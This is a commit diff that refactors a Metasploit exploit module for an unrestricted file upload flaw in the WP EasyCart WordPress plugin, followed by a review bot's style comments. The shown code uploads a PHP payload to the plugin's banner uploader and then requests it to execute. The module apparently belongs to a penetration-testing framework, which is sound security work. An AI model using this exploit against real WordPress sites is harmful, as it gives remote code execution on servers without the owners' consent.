
Commit 8a89b3b

committed
Cleanup of various bits of code
1 parent 8246f4e commit 8a89b3b


1 file changed

+10
-6
lines changed


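--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -4,7 +4,6 @@
 ##
 
 require 'msf/core'
-require 'digest/md5'
 
 class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
@@ -91,7 +90,7 @@ def req_id
 if ec_password_is_hash
 return ec_password
 else
-return Digest::MD5.hexdigest(ec_password)
+return Rex::Text.md5(ec_password)
 end
 end
 
@@ -107,11 +106,15 @@ def generate_mime_message(payload, date_hash, name, include_req_id)
 data
 end
 
-def exploit
+def setup
 if !use_wordpress_authentication && !use_ec_authentication
 fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
 end
 
+super
+end
+
+def exploit
 vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
 vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication
 
@@ -134,10 +137,11 @@ def exploit
 
 print_status("#{peer} - Preparing payload...")
 payload_name = Rex::Text.rand_text_alpha(10)
-date_hash = Digest::MD5.hexdigest(Time.now.to_s)
+date_hash = Rex::Text.md5(Time.now.to_s)
+uploaded_filename = "#{payload_name}_#{date_hash}.php"
 plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
 uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
-payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php")
+payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
 data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)
 
 print_status("#{peer} - Uploading payload to #{payload_url}")
@@ -153,7 +157,7 @@ def exploit
 vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
 
 print_status("#{peer} - Executing the payload...")
-register_files_for_cleanup("#{payload_name}_#{date_hash}.php")
+register_files_for_cleanup(uploaded_filename)
 res = send_request_cgi(
 {
 'uri' => payload_url,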
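Review bot: The new `setup` override (new lines 109–115) carries no comment explaining why the option check was moved out of `exploit`, and its negated condition is harder to read than it needs to be; `unless use_wordpress_authentication || use_ec_authentication` says the same thing. A short comment above it, for example `# Reject an unusable option combination before the run starts; super must still be called afterwards.`, would record the intent and the reason `super` comes last. Separately, `uploaded_filename` now names the stored file in one place, but `generate_mime_message` is still passed `date_hash` and `"#{payload_name}.php"` separately, so the `name_hash.php` layout is presumably still assembled a second time elsewhere; a comment on the `uploaded_filename` line stating where that layout comes from would keep the two from drifting apart. The body of `exploit` continues outside the last hunk.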
